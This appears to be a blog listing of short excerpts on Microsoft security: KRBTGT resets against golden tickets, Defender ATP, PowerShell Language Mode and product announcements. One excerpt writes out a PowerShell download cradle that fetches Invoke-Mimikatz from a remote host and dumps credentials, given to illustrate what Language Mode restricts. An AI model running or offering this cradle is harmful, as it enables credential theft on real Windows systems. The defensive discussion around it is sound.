KRBTGT known as Key Distribution Center Service Account object whose Responsible for the service core of Active Directory.
Now days we expose to so many cyber-attacks which include query and manipulation on KRBTGT user.
Pretty popular attack is golden ticket.
Once an attacker has gained access to the KRBTGT account password hash,
The attacker can create Golden Tickets.
It is important to understand that any existing Golden Tickets will no longer be validate for use after changing the KRBTGT password twice rapidly.
What would cause a lack of use existing tickets and removes the attacker ability to create valid Golden Tickets with their KRBTGT.
Microsoft has taken some steps on cyber-attacks in recent years.
One of them was knowing how to get detailed and complete information from the client to the cloud, with the ability to know what the unusual actions were taking on the client.
Windows Defender Security Center become the solution that manages Windows Defender ATP Client.
The client deployment and management capabilities are among the highest I've come across in all the distribution issues and the ability to disrupt that deployment.
Service signature by certificate is the means that Microsoft has chosen to implement in order to prevent the user from interrupting or stopping...
As we know PowerShell can be much more than a scripting platform, when it comes to administrative rights.
Running unsigned process and scripts will serve the attacker to advance another step in to achieve the objective.
Mimikatz and other painful tools detected by Antiviruses and Antimalware spot, but when they bypass , we are expose to one of the suspicious attacks in PowerShell today.
Using IEX cradle to get new file - is one of them,
Simply upload the PS script and run the following:
“IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.1/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds”
PowerShell can limit access to above command by using Language Mode
FullLanguage - permits all language elements...
Today, Microsoft announce the next step in our efforts to protect enterprise customers, with a new service, Windows Defender Advanced Threat Protection,
Windows Defender Advanced Threat Protection is powered by a combination of Windows behavioral sensors, cloud based security analytics, threat intelligence, and by tapping into Microsoft’s intelligent security graph. This immense security graph provides big-data security analytics that look across aggregate behaviors to identify anomalies – informed by anonymous information from over 1 billion Windows devices, 2.5 trillion indexed URLs on the Web, 600 million reputation look-ups online, and over 1 million suspicious files detonated every day.
Microsoft has a strong, ongoing commitment to help customers stay safe in a world with ever increasing threats from cyber criminals. As Satya announced last year and our Chief Information Security Officer (CISO) reiterated today, Microsoft is making huge investments to help Microsoft's customers stay secure.
Microsoft are excited to announce a new set of security solutions, Microsoft Cloud App Security and Azure AD Identity Protection that together give you a complete solution for monitoring and protecting enterprise cloud apps.
a complete solution for monitoring and protecting enterprise cloud apps
Check out the following link , These are some of the new capabilities included in Microsoft Advanced Threat Analytics Update 1.5:
Microsoft are nearing the finish line. Microsoft Advanced Threat Analytics will be generally available in August 2015:
A great session from last month Microsoft Ignite 2015 By Mark Russinovich to explain the how security components in cloud services are managed. Mark discusses the shared responsibility from the IT and service provider perspectives. Microsoft also cover real customer examples of Their working with customers to detect tenant breach, correct issues and patch any security vulnerabilities:
Last week the Microsoft Identity and Security Services Division announced another new security report feature is now in preview that helps protect Azure Active Directory Premium customers from the risk associated with leaked credentials.